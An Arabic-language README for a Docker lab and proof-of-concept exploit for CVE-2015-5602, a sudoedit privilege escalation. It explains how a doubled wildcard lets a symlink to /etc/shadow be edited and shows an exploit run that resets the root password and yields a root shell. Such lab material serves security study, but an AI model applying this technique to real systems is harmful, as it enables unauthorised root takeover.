
Sudo <= 1.8.14 تصعيد الامتيازات المحلي وحاوية ضعيفة
Sudo (su "do") يسمح لمسؤول النظام بمنح مستخدمين معينين (أو مجموعات من المستخدمين) القدرة على تشغيل بعض (أو كل) الأوامر كجذر مع تسجيل جميع الأوامر والوسائط.
لإعداد بيئة ضعيفة لاختبارك، ستحتاج إلى تثبيت Docker، ثم قم بتشغيل الأمر التالي:
docker build -t privesc/cve-2015-5602 .
docker run --rm -it privesc/cve-2015-5602
وسينشئ شيل تفاعلي بصلاحيات مستخدم منخفضة.
تم العثور على الخلل في sudoedit، الذي لا يتحقق من المسار الكامل إذا تم استخدام بدل (wildcard) مرتين (مثل /home/*/*/esc.txt)، مما يسمح لمستخدم ضار باستبدال الملف الحقيقي esc.txt برابط رمزي إلى موقع مختلف (مثل /etc/shadow).
قد يؤدي استغلال هذه المشكلة بنجاح إلى السماح للمهاجم بالتلاعب بالملفات والحصول على صلاحيات root على النظام المضيف من خلال هجمات الروابط الرمزية.
لاستغلال هذا الهدف، قم بتشغيل:
./exploit.sh
إذا كنت تستخدم هذه الصورة الضعيفة، يمكنك تشغيل:
user@1cc9cd901b07:~$ sudo -l
User user may run the following commands on 1cc9cd901b07:
(root) NOPASSWD: sudoedit /home/*/*/esc.txt
user@1cc9cd901b07:~$ ./exploit.sh
[+] CVE-2015-5602 exploit by t0kx
[+] Creating folder...
[+] Creating symlink
[+] Modify EDITOR...
[+] Change root password to: d03c09dc34c53657aff1f459a86b20ed
[+] Done
user@1cc9cd901b07:~$ su
Password:
root@1cc9cd901b07:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
root@1cc9cd901b07:/home/user#
تم العثور على هذا الخلل بواسطة Daniel Svartman.
هذا البرنامج أو البرامج السابقة هي لأغراض تعليمية فقط. لا تستخدمها دون إذن. ينطبق إخلاء المسؤولية المعتاد، خاصة حقيقة أنني (t0kx) غير مسؤول عن أي أضرار ناتجة عن الاستخدام المباشر أو غير المباشر للمعلومات أو الوظائف التي تقدمها هذه البرامج. لا يتحمل المؤلف أو أي مزود إنترنت أي مسؤولية عن المحتوى أو سوء استخدام هذه البرامج أو أي مشتقات منها. باستخدام هذه البرامج، فإنك تقبل حقيقة أن أي ضرر (فقدان بيانات، تعطل النظام، اختراق النظام، إلخ) ناتج عن استخدام هذه البرامج ليس مسؤولية t0kx.